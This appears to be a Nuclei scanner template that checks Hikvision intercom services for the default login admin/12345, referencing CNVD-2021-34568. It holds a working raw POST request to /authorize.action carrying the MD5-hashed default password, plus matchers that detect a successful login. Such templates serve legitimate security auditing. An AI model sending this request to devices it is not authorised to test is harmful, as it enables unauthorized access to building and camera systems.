http:
    - matchers:
        - part: body
          type: word
          words:
            - '{"success": true, "msg": "OK"}'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /authorize.action HTTP/1.1
          Host: {{Hostname}}

          username=admin&userpsw=827ccb0eea8a706c4c34a16891f84e7b&language=zh_cn
id: hikvision-intercom-service-default-password
info:
    author: xueba
    name: Hikvision Intercom Service Default Password (admin/12345)
    reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-34568
    severity: medium
    tags:
        - Intercom
